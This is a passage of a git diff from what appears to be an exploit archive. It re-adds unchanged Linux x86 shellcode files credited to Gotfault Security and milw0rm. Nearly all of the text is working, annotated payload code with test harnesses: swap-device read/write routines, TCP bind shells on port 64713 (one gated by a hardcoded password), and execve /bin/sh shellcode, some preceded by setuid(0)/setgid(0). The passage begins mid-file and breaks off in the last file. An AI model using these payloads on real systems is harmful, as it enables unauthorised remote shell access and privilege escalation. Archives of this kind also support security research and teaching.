xchg %eax,%ebx - - /* lseek(fd_device, 31337, SEEK_SET) */ - - "\x31\xc9" // xor %ecx,%ecx - "\x6a\x13" // push $0x13 - "\x58" // pop %eax - "\x66\xb9\x69\x7a" // mov $0x7a69,%cx - "\xcd\x80" // int $0x80 - - /* read(fd_device, *buf, 1025) */ - - "\x89\xe1" // mov %esp,%ecx - "\x42" // inc %edx - "\xc1\xe2\x0a" // shl $0xa,%edx - "\x42" // inc %edx - "\x6a\x03" // push $0x3 - "\x58" // pop %eax - "\xcd\x80" // int $0x80 - - "\x89\xe6" // mov %esp,%esi - "\x99" // cltd - "\x31\xff" // xor %edi,%edi - - /* counter loop - read each byte and searchs by 0x0. */ - - "\xac" // lods %ds - "\x38\xd0" // cmp %dl,%al - "\x74\x04" // je 80480b3 - "\x47" // inc %edi - "\xeb\xf8" // jmp 80480aa - - "\x91" // xchg %eax,%ecx - - /* close(fd_device) */ - - "\x6a\x06" // push $0x6 - "\x58" // pop %eax - "\xcd\x80" // int $0x80 - "\x89\xe6" // mov %esp,%esi - - /* open("/tmp/swr", O_CREAT|O_APPEND|O_WRONLY) */ - - "\x66\xb9\x41\x04" // mov $0x441,%cx - "\x52" // push %edx - "\x68\x2f\x73\x77\x72" // push $0x7277732f - "\x68\x2f\x74\x6d\x70" // push $0x706d742f - "\x89\xe3" // mov %esp,%ebx - "\xb0\x05" // mov $0x5,%al - "\xcd\x80" // int $0x80 - - "\x93" // xchg %eax,%ebx - - /* write(fd_filename, *buf, sizeof(buffer)) */ - - "\x6a\x04" // push $0x4 - "\x58" // pop %eax - "\x56" // push %esi - "\x59" // pop %ecx - "\x89\xfa" // mov %edi,%edx - "\xcd\x80" // int $0x80 - - /* close(fd_filename) */ - - "\xb0\x06" // mov $0x6,%al - "\xcd\x80" // int $0x80 - - /* exit(anything) */ - - "\xb0\x01" // mov $0x1,%al - "\xcd\x80" // int $0x80 -; - -int main() { - - int (*f)() = (int(*)())shellcode; - printf("Length: %u\n", strlen(shellcode)); - f(); -} - +/* + * linux-x86-swap-restore.c - SWAP restore shellcode 109 bytes for Linux/x86 + * Copyright (c) 2006 Gotfault Security & rfdslabs + * + * Authors: + * + * dx + * spud + * + * This shellcode reads the swap device at offset 31337. After it searchs by + * NULL byte, it stops and write the readed content to '/tmp/swr' file. + * Probaly you needs to change the device path name in open() device syscall. + * + */ + +char shellcode[] = + + /* open(device, O_RDONLY) */ + + "\x6a\x05" // push $0x5 + "\x58" // pop %eax + "\x99" // cltd + "\x52" // push %edx + "\x68\x73\x64\x61\x31" // push $0x31616473 + "\x68\x64\x65\x76\x2f" // push $0x2f766564 + "\x66\x68\x2f\x2f" // pushw $0x2f2f + "\x89\xe3" // mov %esp,%ebx + "\x52" // push %edx + "\x59" // pop %ecx + "\xcd\x80" // int $0x80 + + "\x93" // xchg %eax,%ebx + + /* lseek(fd_device, 31337, SEEK_SET) */ + + "\x31\xc9" // xor %ecx,%ecx + "\x6a\x13" // push $0x13 + "\x58" // pop %eax + "\x66\xb9\x69\x7a" // mov $0x7a69,%cx + "\xcd\x80" // int $0x80 + + /* read(fd_device, *buf, 1025) */ + + "\x89\xe1" // mov %esp,%ecx + "\x42" // inc %edx + "\xc1\xe2\x0a" // shl $0xa,%edx + "\x42" // inc %edx + "\x6a\x03" // push $0x3 + "\x58" // pop %eax + "\xcd\x80" // int $0x80 + + "\x89\xe6" // mov %esp,%esi + "\x99" // cltd + "\x31\xff" // xor %edi,%edi + + /* counter loop - read each byte and searchs by 0x0. */ + + "\xac" // lods %ds + "\x38\xd0" // cmp %dl,%al + "\x74\x04" // je 80480b3 + "\x47" // inc %edi + "\xeb\xf8" // jmp 80480aa + + "\x91" // xchg %eax,%ecx + + /* close(fd_device) */ + + "\x6a\x06" // push $0x6 + "\x58" // pop %eax + "\xcd\x80" // int $0x80 + "\x89\xe6" // mov %esp,%esi + + /* open("/tmp/swr", O_CREAT|O_APPEND|O_WRONLY) */ + + "\x66\xb9\x41\x04" // mov $0x441,%cx + "\x52" // push %edx + "\x68\x2f\x73\x77\x72" // push $0x7277732f + "\x68\x2f\x74\x6d\x70" // push $0x706d742f + "\x89\xe3" // mov %esp,%ebx + "\xb0\x05" // mov $0x5,%al + "\xcd\x80" // int $0x80 + + "\x93" // xchg %eax,%ebx + + /* write(fd_filename, *buf, sizeof(buffer)) */ + + "\x6a\x04" // push $0x4 + "\x58" // pop %eax + "\x56" // push %esi + "\x59" // pop %ecx + "\x89\xfa" // mov %edi,%edx + "\xcd\x80" // int $0x80 + + /* close(fd_filename) */ + + "\xb0\x06" // mov $0x6,%al + "\xcd\x80" // int $0x80 + + /* exit(anything) */ + + "\xb0\x01" // mov $0x1,%al + "\xcd\x80" // int $0x80 +; + +int main() { + + int (*f)() = (int(*)())shellcode; + printf("Length: %u\n", strlen(shellcode)); + f(); +} + // milw0rm.com [2006-04-16] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13372.c b/platforms/lin_x86/shellcode/13372.c index d5b399eb5..8f29d8e9a 100755 --- a/platforms/lin_x86/shellcode/13372.c +++ b/platforms/lin_x86/shellcode/13372.c @@ -1,106 +1,106 @@ -/* - * linux-x86-swap-store.c - SWAP store shellcode 99 bytes for Linux/x86 - * Copyright (c) 2006 Gotfault Security & rfdslabs - * - * Authors: - * - * dx - * spud - * - * This shellcode reads the content of '/tmp/sws' and stores on swap - * device at offset 31337. Probaly needs to change the device path name - * in open() device syscall. - * - */ - -char shellcode[] = - - /* open(device, O_WRONLY) */ - - "\x6a\x05" // push $0x5 - "\x58" // pop %eax - "\x99" // cltd - "\x52" // push %edx - "\x68\x73\x64\x61\x31" // push $0x31616473 - "\x68\x64\x65\x76\x2f" // push $0x2f766564 - "\x66\x68\x2f\x2f" // pushw $0x2f2f - "\x89\xe3" // mov %esp,%ebx - "\x6a\x01" // push $0x1 - "\x59" // pop %ecx - "\xcd\x80" // int $0x80 - - "\x97" // xchg %eax,%edi - - /* open("/tmp/sws", O_RDONLY) */ - - "\x49" // dec %ecx - "\x52" // push %edx - "\x68\x2f\x73\x77\x73" // push $0x7377732f - "\x68\x2f\x74\x6d\x70" // push $0x706d742f - "\x89\xe3" // mov %esp,%ebx - "\x6a\x05" // push $0x5 - "\x58" // pop %eax - "\xcd\x80" // int $0x80 - - "\x93" // xchg %eax,%ebx - - /* read(fd_filename, *buf, 256) */ - - "\x89\xe1" // mov %esp,%ecx - "\x42" // inc %edx - "\xc1\xe2\x0a" // shl $0xa,%edx - "\x6a\x03" // push $0x3 - "\x58" // pop %eax - "\xcd\x80" // int $0x80 - - "\x96" // xchg %eax,%esi - - /* close(fd_filename) */ - - "\x6a\x06" // push $0x6 - "\x58" // pop %eax - "\xcd\x80" // int $0x80 - - "\x92" // xchg %eax,%edx - - /* lseek(fd_device, 31337, SEEK_SET) */ - - "\x31\xc9" // xor %ecx,%ecx - "\x6a\x13" // push $0x13 - "\x58" // pop %eax - "\x89\xfb" // mov %edi,%ebx - "\x66\xb9\x69\x7a" // mov $0x7a69,%cx - "\xcd\x80" // int $0x80 - - /* write(fd_device, *buf, 1025) */ - - - "\x89\x14\x34" // mov %edx,(%esp,%esi,1) - "\x6a\x04" // push $0x4 - "\x58" // pop %eax - "\x54" // push %esp - "\x59" // pop %ecx - "\x56" // push %esi - "\x5a" // pop %edx - "\x42" // inc %edx - "\xcd\x80" // int $0x80 - - /* close(fd_device) */ - - "\xb0\x06" // mov $0x6,%al - "\xcd\x80" // int $0x80 - - /* exit(anything) */ - - "\xb0\x01" // mov $0x1,%al - "\xcd\x80" // int $0x80 -; - -int main() { - - int (*f)() = (int(*)())shellcode; - printf("Length: %u\n", strlen(shellcode)); - f(); -} - +/* + * linux-x86-swap-store.c - SWAP store shellcode 99 bytes for Linux/x86 + * Copyright (c) 2006 Gotfault Security & rfdslabs + * + * Authors: + * + * dx + * spud + * + * This shellcode reads the content of '/tmp/sws' and stores on swap + * device at offset 31337. Probaly needs to change the device path name + * in open() device syscall. + * + */ + +char shellcode[] = + + /* open(device, O_WRONLY) */ + + "\x6a\x05" // push $0x5 + "\x58" // pop %eax + "\x99" // cltd + "\x52" // push %edx + "\x68\x73\x64\x61\x31" // push $0x31616473 + "\x68\x64\x65\x76\x2f" // push $0x2f766564 + "\x66\x68\x2f\x2f" // pushw $0x2f2f + "\x89\xe3" // mov %esp,%ebx + "\x6a\x01" // push $0x1 + "\x59" // pop %ecx + "\xcd\x80" // int $0x80 + + "\x97" // xchg %eax,%edi + + /* open("/tmp/sws", O_RDONLY) */ + + "\x49" // dec %ecx + "\x52" // push %edx + "\x68\x2f\x73\x77\x73" // push $0x7377732f + "\x68\x2f\x74\x6d\x70" // push $0x706d742f + "\x89\xe3" // mov %esp,%ebx + "\x6a\x05" // push $0x5 + "\x58" // pop %eax + "\xcd\x80" // int $0x80 + + "\x93" // xchg %eax,%ebx + + /* read(fd_filename, *buf, 256) */ + + "\x89\xe1" // mov %esp,%ecx + "\x42" // inc %edx + "\xc1\xe2\x0a" // shl $0xa,%edx + "\x6a\x03" // push $0x3 + "\x58" // pop %eax + "\xcd\x80" // int $0x80 + + "\x96" // xchg %eax,%esi + + /* close(fd_filename) */ + + "\x6a\x06" // push $0x6 + "\x58" // pop %eax + "\xcd\x80" // int $0x80 + + "\x92" // xchg %eax,%edx + + /* lseek(fd_device, 31337, SEEK_SET) */ + + "\x31\xc9" // xor %ecx,%ecx + "\x6a\x13" // push $0x13 + "\x58" // pop %eax + "\x89\xfb" // mov %edi,%ebx + "\x66\xb9\x69\x7a" // mov $0x7a69,%cx + "\xcd\x80" // int $0x80 + + /* write(fd_device, *buf, 1025) */ + + + "\x89\x14\x34" // mov %edx,(%esp,%esi,1) + "\x6a\x04" // push $0x4 + "\x58" // pop %eax + "\x54" // push %esp + "\x59" // pop %ecx + "\x56" // push %esi + "\x5a" // pop %edx + "\x42" // inc %edx + "\xcd\x80" // int $0x80 + + /* close(fd_device) */ + + "\xb0\x06" // mov $0x6,%al + "\xcd\x80" // int $0x80 + + /* exit(anything) */ + + "\xb0\x01" // mov $0x1,%al + "\xcd\x80" // int $0x80 +; + +int main() { + + int (*f)() = (int(*)())shellcode; + printf("Length: %u\n", strlen(shellcode)); + f(); +} + // milw0rm.com [2006-04-16] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13373.c b/platforms/lin_x86/shellcode/13373.c index e608841f6..f33a5bf0d 100755 --- a/platforms/lin_x86/shellcode/13373.c +++ b/platforms/lin_x86/shellcode/13373.c @@ -1,136 +1,136 @@ -/* - * linux-x86-authportbind.c - AUTH portbind shellcode 166 bytes for Linux/x86 - * Copyright (c) 2006 Gotfault Security - * - * portbind shellcode that bind()'s a shell on port 64713/tcp - * and requests a user password. - * - */ - -char shellcode[] = - - /* socket(AF_INET, SOCK_STREAM, 0) */ - - "\x6a\x66" // push $0x66 - "\x58" // pop %eax - "\x6a\x01" // push $0x1 - "\x5b" // pop %ebx - "\x99" // cltd - "\x52" // push %edx - "\x53" // push %ebx - "\x6a\x02" // push $0x2 - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80" // int $0x80 - - /* bind(s, server, sizeof(server)) */ - - "\x52" // push %edx - "\x66\x68\xfc\xc9" // pushw $0xc9fc // PORT = 64713 - "\x66\x6a\x02" // pushw $0x2 - "\x89\xe1" // mov $esp,%ecx - "\x6a\x10" // push $0x10 - "\x51" // push %ecx - "\x50" // push %eax - "\x89\xe1" // mov %esp,%ecx - "\x89\xc6" // mov %eax,%esi - "\x43" // inc %ebx - "\xb0\x66" // mov $0x66,%al - "\xcd\x80" // int $0x80 - - /* listen(s, anything) */ - - "\xb0\x66" // mov $0x66,%al - "\xd1\xe3" // shl %ebx - "\xcd\x80" // int $0x80 - - /* accept(s, 0, 0) */ - - "\x52" // push %edx - "\x52" // push %edx - "\x56" // push %esi - "\x89\xe1" // mov %esp,%ecx - "\x43" // inc %ebx - "\xb0\x66" // mov $0x66,%al - "\xcd\x80" // int $0x80 - - "\x96" // xchg %eax,%esi - - /* send(s, "Password: ", 0x0a, flags) */ - - "\x52" // push %edx - "\x68\x72\x64\x3a\x20" // push $0x203a6472 - "\x68\x73\x73\x77\x6f" // push $0x6f777373 - "\x66\x68\x50\x61" // pushw $0x6150 - "\x89\xe7" // mov $esp,%edi - "\x6a\x0a" // push $0xa - "\x57" // push %edi - "\x56" // push %esi - "\x89\xe1" // mov %esp,%ecx - "\xb3\x09" // mov $0x9,%bl - "\xb0\x66" // mov $0x66,%al - "\xcd\x80" // int $0x80 - - /* recv(s, *buf, 0x08, flags) */ - - "\x52" // push %edx - "\x6a\x08" // push $0x8 - "\x8d\x4c\x24\x08" // lea 0x8(%esp),%ecx - "\x51" // push %ecx - "\x56" // push %esi - "\x89\xe1" // mov %esp,%ecx - "\xb3\x0a" // mov $0xa,%bl - "\xb0\x66" // mov $0x66,%al - "\xcd\x80" // int $0x80 - - "\x87\xf3" // xchg %esi,%ebx - - /* like: strncmp(string1, string2, 0x8) */ - - "\x52" // push %edx - "\x68\x61\x75\x6c\x74" // push $0x746c7561 // password - "\x68\x67\x6f\x74\x66" // push $0x66746f67 // here - "\x89\xe7" // mov %esp,%edi - "\x8d\x74\x24\x1c" // lea 0x1c(%esp),%esi - "\x89\xd1" // mov %edx,%ecx - "\x80\xc1\x08" // add $0x8,%cl - "\xfc" // cld - "\xf3\xa6" // repz cmpsb %es:(%edi),%ds:(%esi) - "\x74\x04" // je dup - - /* exit(something) */ - - "\xf7\xf0" // div %eax - "\xcd\x80" // int $0x80 - - /* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */ - - "\x6a\x02" // push $0x2 - "\x59" // pop %ecx - - "\xb0\x3f" // mov $0x3f,%al - "\xcd\x80" // int $0x80 - "\x49" // dec %ecx - "\x79\xf9" // jns dup_loop - - /* execve("/bin/sh", ["/bin/sh"], NULL) */ - - "\x6a\x0b" // push $0xb - "\x58" // pop %eax - "\x52" // push %edx - "\x68\x2f\x2f\x73\x68" // push $0x68732f2f - "\x68\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp, %ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x89\xe1" // mov %esp, %ecx - "\xcd\x80"; // int $0x80 - - -int main() { - - int (*f)() = (int(*)())shellcode; - printf("Length: %u\n", strlen(shellcode)); - f(); -} - +/* + * linux-x86-authportbind.c - AUTH portbind shellcode 166 bytes for Linux/x86 + * Copyright (c) 2006 Gotfault Security + * + * portbind shellcode that bind()'s a shell on port 64713/tcp + * and requests a user password. + * + */ + +char shellcode[] = + + /* socket(AF_INET, SOCK_STREAM, 0) */ + + "\x6a\x66" // push $0x66 + "\x58" // pop %eax + "\x6a\x01" // push $0x1 + "\x5b" // pop %ebx + "\x99" // cltd + "\x52" // push %edx + "\x53" // push %ebx + "\x6a\x02" // push $0x2 + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80" // int $0x80 + + /* bind(s, server, sizeof(server)) */ + + "\x52" // push %edx + "\x66\x68\xfc\xc9" // pushw $0xc9fc // PORT = 64713 + "\x66\x6a\x02" // pushw $0x2 + "\x89\xe1" // mov $esp,%ecx + "\x6a\x10" // push $0x10 + "\x51" // push %ecx + "\x50" // push %eax + "\x89\xe1" // mov %esp,%ecx + "\x89\xc6" // mov %eax,%esi + "\x43" // inc %ebx + "\xb0\x66" // mov $0x66,%al + "\xcd\x80" // int $0x80 + + /* listen(s, anything) */ + + "\xb0\x66" // mov $0x66,%al + "\xd1\xe3" // shl %ebx + "\xcd\x80" // int $0x80 + + /* accept(s, 0, 0) */ + + "\x52" // push %edx + "\x52" // push %edx + "\x56" // push %esi + "\x89\xe1" // mov %esp,%ecx + "\x43" // inc %ebx + "\xb0\x66" // mov $0x66,%al + "\xcd\x80" // int $0x80 + + "\x96" // xchg %eax,%esi + + /* send(s, "Password: ", 0x0a, flags) */ + + "\x52" // push %edx + "\x68\x72\x64\x3a\x20" // push $0x203a6472 + "\x68\x73\x73\x77\x6f" // push $0x6f777373 + "\x66\x68\x50\x61" // pushw $0x6150 + "\x89\xe7" // mov $esp,%edi + "\x6a\x0a" // push $0xa + "\x57" // push %edi + "\x56" // push %esi + "\x89\xe1" // mov %esp,%ecx + "\xb3\x09" // mov $0x9,%bl + "\xb0\x66" // mov $0x66,%al + "\xcd\x80" // int $0x80 + + /* recv(s, *buf, 0x08, flags) */ + + "\x52" // push %edx + "\x6a\x08" // push $0x8 + "\x8d\x4c\x24\x08" // lea 0x8(%esp),%ecx + "\x51" // push %ecx + "\x56" // push %esi + "\x89\xe1" // mov %esp,%ecx + "\xb3\x0a" // mov $0xa,%bl + "\xb0\x66" // mov $0x66,%al + "\xcd\x80" // int $0x80 + + "\x87\xf3" // xchg %esi,%ebx + + /* like: strncmp(string1, string2, 0x8) */ + + "\x52" // push %edx + "\x68\x61\x75\x6c\x74" // push $0x746c7561 // password + "\x68\x67\x6f\x74\x66" // push $0x66746f67 // here + "\x89\xe7" // mov %esp,%edi + "\x8d\x74\x24\x1c" // lea 0x1c(%esp),%esi + "\x89\xd1" // mov %edx,%ecx + "\x80\xc1\x08" // add $0x8,%cl + "\xfc" // cld + "\xf3\xa6" // repz cmpsb %es:(%edi),%ds:(%esi) + "\x74\x04" // je dup + + /* exit(something) */ + + "\xf7\xf0" // div %eax + "\xcd\x80" // int $0x80 + + /* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */ + + "\x6a\x02" // push $0x2 + "\x59" // pop %ecx + + "\xb0\x3f" // mov $0x3f,%al + "\xcd\x80" // int $0x80 + "\x49" // dec %ecx + "\x79\xf9" // jns dup_loop + + /* execve("/bin/sh", ["/bin/sh"], NULL) */ + + "\x6a\x0b" // push $0xb + "\x58" // pop %eax + "\x52" // push %edx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp, %ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp, %ecx + "\xcd\x80"; // int $0x80 + + +int main() { + + int (*f)() = (int(*)())shellcode; + printf("Length: %u\n", strlen(shellcode)); + f(); +} + // milw0rm.com [2006-04-06] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13374.c b/platforms/lin_x86/shellcode/13374.c index a5322287e..8a352b24f 100755 --- a/platforms/lin_x86/shellcode/13374.c +++ b/platforms/lin_x86/shellcode/13374.c @@ -1,86 +1,86 @@ -/* - * linux-x86-portbind.c - portbind shellcode 86 bytes for Linux/x86 - * Copyright (c) 2006 Gotfault Security - * - * portbind shellcode that bind()'s a shell on port 64713/tcp - * - */ - -char shellcode[] = - - /* socket(AF_INET, SOCK_STREAM, 0) */ - - "\x6a\x66" // push $0x66 - "\x58" // pop %eax - "\x6a\x01" // push $0x1 - "\x5b" // pop %ebx - "\x99" // cltd - "\x52" // push %edx - "\x53" // push %ebx - "\x6a\x02" // push $0x2 - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80" // int $0x80 - - /* bind(s, server, sizeof(server)) */ - - "\x52" // push %edx - "\x66\x68\xfc\xc9" // pushw $0xc9fc // PORT = 64713 - "\x66\x6a\x02" // pushw $0x2 - "\x89\xe1" // mov $esp,%ecx - "\x6a\x10" // push $0x10 - "\x51" // push %ecx - "\x50" // push %eax - "\x89\xe1" // mov %esp,%ecx - "\x89\xc6" // mov %eax,%esi - "\x43" // inc %ebx - "\xb0\x66" // mov $0x66,%al - "\xcd\x80" // int $0x80 - - /* listen(s, anything) */ - - "\xb0\x66" // mov $0x66,%al - "\xd1\xe3" // shl %ebx - "\xcd\x80" // int $0x80 - - /* accept(s, 0, 0) */ - - "\x52" // push %edx - "\x56" // push %esi - "\x89\xe1" // mov %esp,%ecx - "\x43" // inc %ebx - "\xb0\x66" // mov $0x66,%al - "\xcd\x80" // int $0x80 - - "\x93" // xchg %eax,%ebx - - /* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */ - - "\x6a\x02" // push $0x2 - "\x59" // pop %ecx - - "\xb0\x3f" // mov $0x3f,%al - "\xcd\x80" // int $0x80 - "\x49" // dec %ecx - "\x79\xf9" // jns dup_loop - - /* execve("/bin/sh", ["/bin/sh"], NULL) */ - - "\x6a\x0b" // push $0xb - "\x58" // pop %eax - "\x52" // push %edx - "\x68\x2f\x2f\x73\x68" // push $0x68732f2f - "\x68\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp, %ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x89\xe1" // mov %esp, %ecx - "\xcd\x80"; // int $0x80 - -int main() { - - int (*f)() = (int(*)())shellcode; - printf("Length: %u\n", strlen(shellcode)); - f(); -} - +/* + * linux-x86-portbind.c - portbind shellcode 86 bytes for Linux/x86 + * Copyright (c) 2006 Gotfault Security + * + * portbind shellcode that bind()'s a shell on port 64713/tcp + * + */ + +char shellcode[] = + + /* socket(AF_INET, SOCK_STREAM, 0) */ + + "\x6a\x66" // push $0x66 + "\x58" // pop %eax + "\x6a\x01" // push $0x1 + "\x5b" // pop %ebx + "\x99" // cltd + "\x52" // push %edx + "\x53" // push %ebx + "\x6a\x02" // push $0x2 + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80" // int $0x80 + + /* bind(s, server, sizeof(server)) */ + + "\x52" // push %edx + "\x66\x68\xfc\xc9" // pushw $0xc9fc // PORT = 64713 + "\x66\x6a\x02" // pushw $0x2 + "\x89\xe1" // mov $esp,%ecx + "\x6a\x10" // push $0x10 + "\x51" // push %ecx + "\x50" // push %eax + "\x89\xe1" // mov %esp,%ecx + "\x89\xc6" // mov %eax,%esi + "\x43" // inc %ebx + "\xb0\x66" // mov $0x66,%al + "\xcd\x80" // int $0x80 + + /* listen(s, anything) */ + + "\xb0\x66" // mov $0x66,%al + "\xd1\xe3" // shl %ebx + "\xcd\x80" // int $0x80 + + /* accept(s, 0, 0) */ + + "\x52" // push %edx + "\x56" // push %esi + "\x89\xe1" // mov %esp,%ecx + "\x43" // inc %ebx + "\xb0\x66" // mov $0x66,%al + "\xcd\x80" // int $0x80 + + "\x93" // xchg %eax,%ebx + + /* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */ + + "\x6a\x02" // push $0x2 + "\x59" // pop %ecx + + "\xb0\x3f" // mov $0x3f,%al + "\xcd\x80" // int $0x80 + "\x49" // dec %ecx + "\x79\xf9" // jns dup_loop + + /* execve("/bin/sh", ["/bin/sh"], NULL) */ + + "\x6a\x0b" // push $0xb + "\x58" // pop %eax + "\x52" // push %edx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp, %ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp, %ecx + "\xcd\x80"; // int $0x80 + +int main() { + + int (*f)() = (int(*)())shellcode; + printf("Length: %u\n", strlen(shellcode)); + f(); +} + // milw0rm.com [2006-04-06] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13375.c b/platforms/lin_x86/shellcode/13375.c index e2c97e8a8..1ad9a0e71 100755 --- a/platforms/lin_x86/shellcode/13375.c +++ b/platforms/lin_x86/shellcode/13375.c @@ -1,29 +1,29 @@ -/* - * (Linux/x86) execve("/bin/sh", ["/bin/sh", NULL]) - * - 25 bytes - * - xgc@gotfault.net - * - */ - -char shellcode[] = - - "\x31\xc0" // xor %eax, %eax - "\x50" // push %eax - "\x68\x2f\x2f\x73\x68" // push $0x68732f2f - "\x68\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp, %ebx - "\x50" // push %eax - "\x53" // push %ebx - "\x89\xe1" // mov %esp, %ecx - "\x31\xd2" // xor %edx, %edx - "\xb0\x0b" // mov $0xb, %al - "\xcd\x80"; // int $0x80 - -int main() { - - int (*f)() = (int(*)())shellcode; - printf("Length: %u\n", strlen(shellcode)); - f(); -} - +/* + * (Linux/x86) execve("/bin/sh", ["/bin/sh", NULL]) + * - 25 bytes + * - xgc@gotfault.net + * + */ + +char shellcode[] = + + "\x31\xc0" // xor %eax, %eax + "\x50" // push %eax + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp, %ebx + "\x50" // push %eax + "\x53" // push %ebx + "\x89\xe1" // mov %esp, %ecx + "\x31\xd2" // xor %edx, %edx + "\xb0\x0b" // mov $0xb, %al + "\xcd\x80"; // int $0x80 + +int main() { + + int (*f)() = (int(*)())shellcode; + printf("Length: %u\n", strlen(shellcode)); + f(); +} + // milw0rm.com [2006-04-03] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13376.c b/platforms/lin_x86/shellcode/13376.c index b0c96a4f7..83b6fec88 100755 --- a/platforms/lin_x86/shellcode/13376.c +++ b/platforms/lin_x86/shellcode/13376.c @@ -1,31 +1,31 @@ -/* - * linux-x86-binshv2.c - 23 bytes - * Copyright (c) 2006 Gotfault Security - * - * (Linux/x86) execve("/bin/sh", ["/bin/sh", NULL]) - * - */ - - -char shellcode[] = - - "\x6a\x0b" // push $0xb - "\x58" // pop %eax - "\x99" // cltd - "\x52" // push %edx - "\x68\x2f\x2f\x73\x68" // push $0x68732f2f - "\x68\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp, %ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x89\xe1" // mov %esp, %ecx - "\xcd\x80"; // int $0x80 - -int main() { - - int (*f)() = (int(*)())shellcode; - printf("Length: %u\n", strlen(shellcode)); - f(); -} - +/* + * linux-x86-binshv2.c - 23 bytes + * Copyright (c) 2006 Gotfault Security + * + * (Linux/x86) execve("/bin/sh", ["/bin/sh", NULL]) + * + */ + + +char shellcode[] = + + "\x6a\x0b" // push $0xb + "\x58" // pop %eax + "\x99" // cltd + "\x52" // push %edx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp, %ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp, %ecx + "\xcd\x80"; // int $0x80 + +int main() { + + int (*f)() = (int(*)())shellcode; + printf("Length: %u\n", strlen(shellcode)); + f(); +} + // milw0rm.com [2006-04-03] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13377.c b/platforms/lin_x86/shellcode/13377.c index 4572251ae..483b93358 100755 --- a/platforms/lin_x86/shellcode/13377.c +++ b/platforms/lin_x86/shellcode/13377.c @@ -1,34 +1,34 @@ -/* - * (Linux/x86) setuid(0) + execve("/bin/sh", ["/bin/sh", NULL]) - * - 31 bytes - * - xgc@gotfault.net - * - */ - -char shellcode[] = - - "\x6a\x17" // push $0x17 - "\x58" // pop %eax - "\x31\xdb" // xor %ebx, %ebx - "\xcd\x80" // int $0x80 - - "\x31\xd2" // xor %edx, %edx - "\x6a\x0b" // push $0xb - "\x58" // pop %eax - "\x52" // push %edx - "\x68\x2f\x2f\x73\x68" // push $0x68732f2f - "\x68\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp, %ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x89\xe1" // mov %esp, %ecx - "\xcd\x80"; // int $0x80 - -int main() { - - int (*f)() = (int(*)())shellcode; - printf("Length: %u\n", strlen(shellcode)); - f(); -} - +/* + * (Linux/x86) setuid(0) + execve("/bin/sh", ["/bin/sh", NULL]) + * - 31 bytes + * - xgc@gotfault.net + * + */ + +char shellcode[] = + + "\x6a\x17" // push $0x17 + "\x58" // pop %eax + "\x31\xdb" // xor %ebx, %ebx + "\xcd\x80" // int $0x80 + + "\x31\xd2" // xor %edx, %edx + "\x6a\x0b" // push $0xb + "\x58" // pop %eax + "\x52" // push %edx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp, %ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp, %ecx + "\xcd\x80"; // int $0x80 + +int main() { + + int (*f)() = (int(*)())shellcode; + printf("Length: %u\n", strlen(shellcode)); + f(); +} + // milw0rm.com [2006-04-03] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13378.c b/platforms/lin_x86/shellcode/13378.c index 9af8661b1..a0e5e0bc5 100755 --- a/platforms/lin_x86/shellcode/13378.c +++ b/platforms/lin_x86/shellcode/13378.c @@ -1,39 +1,39 @@ -/* - * (Linux/x86) setuid(0) + setgid(0) + execve("/bin/sh", ["/bin/sh", NULL]) - * - 37 bytes - * - xgc@gotfault.net - * - */ - -char shellcode[] = - - "\x6a\x17" // push $0x17 - "\x58" // pop %eax - "\x31\xdb" // xor %ebx, %ebx - "\xcd\x80" // int $0x80 - - "\x6a\x2e" // push $0x2e - "\x58" // pop %eax - "\x53" // push %ebx - "\xcd\x80" // int $0x80 - - "\x31\xd2" // xor %edx, %edx - "\x6a\x0b" // push $0xb - "\x58" // pop %eax - "\x52" // push %edx - "\x68\x2f\x2f\x73\x68" // push $0x68732f2f - "\x68\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp, %ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x89\xe1" // mov %esp, %ecx - "\xcd\x80"; // int $0x80 - -int main() { - - int (*f)() = (int(*)())shellcode; - printf("Length: %u\n", strlen(shellcode)); - f(); -} - +/* + * (Linux/x86) setuid(0) + setgid(0) + execve("/bin/sh", ["/bin/sh", NULL]) + * - 37 bytes + * - xgc@gotfault.net + * + */ + +char shellcode[] = + + "\x6a\x17" // push $0x17 + "\x58" // pop %eax + "\x31\xdb" // xor %ebx, 